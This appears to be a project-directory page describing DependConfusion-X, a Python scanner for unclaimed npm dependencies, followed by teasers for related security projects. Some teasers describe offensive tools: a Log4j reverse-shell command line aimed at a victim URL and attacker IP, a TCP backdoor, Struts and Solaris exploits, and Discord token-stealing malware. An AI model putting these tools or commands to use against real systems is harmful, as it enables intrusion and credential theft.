DependConfusion-X Tool is written in Python3 that scans and monitors list of hosts for Dependency Confusion

Last update: Dec 21, 2021

Overview

DependConfusion-X

DependConfusion-X Tool is written in Python3 which allows security researcher/bug bounty hunter to scan and monitor list of hosts for Dependency Confusion. Currently, it extracts application dependencies from https://example.com/package.json, and tries to find unclaimed dependency on https://registry.npmjs.org.

Requirements

Python 3
Linux/Windows/MAC OSX
Slack Webhook (Optional)

Installation

Installing Python dependencies

pip3 install -r requirements.txt
Configuring Slack Webhook as env variable

export slack_webhook=""

Usage

To run DependConfusion-X:

python3 dependconfusion-x.py -l hosts_file [--slack, --threads 20]

Owner

Ali Fathi Ali Sawehli

Security Engineer 🦸‍♂️

GitHub Repository

Web Scraping com Python - Raspando Vagas para Programadores

Web Scraping com Python - Raspando Vagas para Programadores Sobre o Projeto Web

3 Dec 30, 2021

script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

1 Dec 18, 2021

CVE 2020-14871 Solaris exploit

CVE 2020-14871 Solaris exploit This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems. The act

2 Oct 25, 2022

Simple tool to create passwords.

PasswordGenerator Simple password generator: -Simplisitc Window Application -Allows Numbers, Symbols & letters upper and lowercase -Restricts rows of

1 Jan 10, 2022

Experimental musig2 python code, not for production use!

musig2-py Experimental musig2 python code, not for production use! This is just for testing things out. All public keys are encoded as 32 bytes, assum

14 Jul 08, 2022

Add a Web Server based on Rogue Mysql Server to allow remote user get

介绍对于需要使用 Rogue Mysql Server 的漏洞来说，若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-

6 May 17, 2022

Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

16 Mar 24, 2022

Deobfuscate Log4Shell payloads with ease

Ox4Shell Deobfuscate Log4Shell payloads with ease. Description Since the release

137 Jan 02, 2023

Evil-stalker - A simple tool written in python, it is so simple that it is based on google dorks

evil-stalker How to run First of all, you must install the necessary libraries.

6 Nov 16, 2022

You can manage your password with this program.

You must have Python compilers in order to run this program. First of all, download the compiler in the link.

6 Aug 07, 2021

List of S3 Hacks

s3-leaks List of AWS S3 Leaks Feel free to send in a PR if you know of other leaks Date Description Notes Aug2020 S3 bucket mess up exposed 182GB of s

291 Dec 28, 2022

A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts.

PyArmor Homepage (中文版网站) Documentation(中文版) PyArmor is a command line tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine

1.9k Dec 30, 2022

Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

Vital What is Vital? Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (

59 Dec 01, 2022

S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805 Remote code execution S2-062 (CVE-2021-31805) Due to Apache Struts2's incomplete fix for S2-061 (CVE-2020-17530), some tag attributes c

31 Nov 22, 2022

A semi-automatic osint/recon framework.

Smog Framework A semi-automatic osint/recon framework. Requirements git Python = 3.8 How to use it

22 Oct 17, 2022

Scarecrow is a tool written in Python3 allowing you to protect your Python3 scripts.

🕷️ Scarecrow 🕷️ Scarecrow is a tool written in Python3 allowing you to protect your Python3 scripts. It looks for processes with specific names to v

33 Sep 28, 2022

Scout Suite - an open source multi-cloud security-auditing tool,

Description Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using t

5k Jan 05, 2023

Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

91 Dec 29, 2022

A TCP Backdoor made in python

Tracey-Backdoor A Reverse Shell Backdoor made in python OOP. It supposed to work in Windows and Linux OS Functions: Reverse Connection Send Reverse TC

13 Oct 15, 2022

This tool was created in order to automate some basic OSINT tasks for penetration testing assingments.

This tool was created in order to automate some basic OSINT tasks for penetration testing assingments. The main feature that I haven't seen much anywhere is the downloadd google dork function where t

5 May 31, 2022